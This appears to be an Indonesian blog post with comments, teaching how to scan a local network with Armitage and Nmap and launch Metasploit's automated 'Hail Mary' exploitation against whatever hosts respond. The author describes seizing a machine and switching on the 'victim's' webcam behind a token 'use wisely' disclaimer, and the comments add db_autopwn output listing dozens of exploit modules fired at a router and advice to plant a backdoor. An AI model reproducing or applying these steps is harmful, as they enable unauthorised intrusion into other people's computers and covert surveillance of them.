Yoo waasappp
kali ini gua akan share cara mengexploit dengan menggunakan armitage
Saran gua sih gunakan exploit ini untuk pengetahuan aja ya gan jangan sampai
merugikan orang lain apalagi mencuri data orang lain gua ga tanggung yee hha
oke langsung aja kagausah basa basi
yang pertama anda menggunakan os KALI LINUX
root@bt:~# msfgui > klik start new msfrpcd
nanti keluar dialog box msfgui dan tunggu sebentar sampai loading nya selesai.......
Lalu pilih > file > show connections detail
nah nanti akan keluar dialog box baru lagi, jangan ditutup kita perlu pass nya untuk masuk ke armitage
sekarang buka konsole baru:
root@bt:~# armitage (atau dari menu juga bisa, terserah aja)
nah kalo semuanya berjalan dengan lancar tampilannya nanti begini:
oke, kita tinggal samain aja pass di connection detail ke armitage.
nah kalo udah tinggal klik connect
Kalo ga ada yang salah langkah2 nya Insya Allah berhasil, terus kalo sudah masuk ke armitage kita closed connection detail dan msfgui tapi jangan di stop
file > quit > No
Sekarang gua anggap udah pada masuk ke armitage.
kalo udah masuk armitage langsung aja pilih menu:
Hosts > Nmap > Quick scan (OS detect)
masukin Router Ip Contoh: 192.168.100.1/24
tunggu sebentar
nanti akan muncul IP address yang lagi online beserta OS yang dipakai.
kalo berhasil nanti keluarnya begini....
oke, langsung aja mainkan hailmary nya.....
pilih menu > attacks > Hailmary > by port > Tunggu lagi deh.......hehehehe
kebanyakan nunggu yaa.... mending nge pes dulu gan
Oiya, hail mary ini otomatis cari sendiri dia exploitnya...
untuk hasilnya kalo berhasil seperti ini:
IP 192.168.100.12 berhasil dikuasai........heheheheh
selanjutnya terserah lu mau screenshoot atau aktifin webcam atau yang lain nya tinggal klik kanan komputer yg ada petirnya lalu pilih deh yang mau di explore....pokoknya lengkap lah.
kalo gua nyoba aktifin webcam korban gan...
NOTE : GUNAKAN SEBIJAK MUNGKIN YA GAN !!!
3 Comments
ane ko eror ya bro, setelah ane Nmap > quick scan (Os detected) terus keluar show message :
Scan Complete !
Use Attacks ->>Find Attacks to suggest
Applicable exploits for your targets. > OK
terus keluar kompi target , tp kok hitam semua ya bos, gak da yang tampilan OS nya.
terus
ane HAILMARY > by port kok keluarnya cm ginian ya bos??
db_autopwn -r -e -p -R great
[*] (1/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.1.1:80...
[*] (2/111 [0 sessions]): Launching exploit/unix/webapp/phpmyadmin_config against 192.168.1.1:80...
[*] (3/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmp against 192.168.1.1:80...
[*] (4/111 [0 sessions]): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.1.1:80...
[*] (5/111 [0 sessions]): Launching exploit/windows/http/httpdx_handlepeer against 192.168.1.1:80...
[*] (6/111 [0 sessions]): Launching exploit/unix/webapp/mitel_awc_exec against 192.168.1.1:80...
[*] (7/111 [0 sessions]): Launching exploit/windows/ftp/easyftp_mkd_fixret against 192.168.1.1:21...
[*] (8/111 [0 sessions]): Launching exploit/windows/ftp/httpdx_tolog_format against 192.168.1.1:21...
[*] (9/111 [0 sessions]): Launching exploit/unix/webapp/phpbb_highlight against 192.168.1.1:80...
[*] (10/111 [0 sessions]): Launching exploit/windows/http/navicopa_get_overflow against 192.168.1.1:80...
[*] (11/111 [0 sessions]): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.1.1:80...
[*] (12/111 [0 sessions]): Launching exploit/windows/ftp/easyftp_cwd_fixret against 192.168.1.1:21...
[*] (13/111 [0 sessions]): Launching exploit/windows/http/coldfusion_fckeditor against 192.168.1.1:80...
[*] (14/111 [0 sessions]): Launching exploit/windows/http/integard_password_bof against 192.168.1.1:80...
[*] (15/111 [0 sessions]): Launching exploit/windows/http/ca_arcserve_rpc_authbypass against 192.168.1.1:80...
[*] (16/111 [0 sessions]): Launching exploit/unix/webapp/cacti_graphimage_exec against 192.168.1.1:80...
[*] (17/111 [0 sessions]): Launching exploit/unix/webapp/generic_exec against 192.168.1.1:80...
[*] (18/111 [0 sessions]): Launching exploit/linux/ftp/proftp_telnet_iac against 192.168.1.1:21...
[*] (19/111 [0 sessions]): Launching exploit/linux/ftp/proftp_sreplace against 192.168.1.1:21...
[*] (20/111 [0 sessions]): Launching exploit/windows/http/easyftp_list against 192.168.1.1:80...
[*] (21/111 [0 sessions]): Launching exploit/multi/http/axis2_deployer against 192.168.1.1:80...
[*] (22/111 [0 sessions]): Launching exploit/windows/proxy/bluecoat_winproxy_host against 192.168.1.1:80...
[*] (23/111 [0 sessions]): Launching exploit/windows/ftp/globalscapeftp_input against 192.168.1.1:21...
kok gak muncul kompi target yang ada petirnya itu ya bro???
berkali2 ane coba terus gt ya bro???
klo diliat dari list diatas, kan itu hasil dari line metasploit:
db_autopwn -r -e -p -R great
yg artinya dia akan mencoba exploit yang ada berdasarkan port yang terbuka pada pc calon korban
tapi, klo pc calon korban tadi udah di patch atau menggunakan firewall dan antivirus maka cara ini ga akan berhasil bro
harus bikin payload yg nantinya akan ditanam di pc korban atau backdoor klo temen2 bilang
cara pakeny gmn ya bang hhe maklum newbe :)
EmoticonEmoticon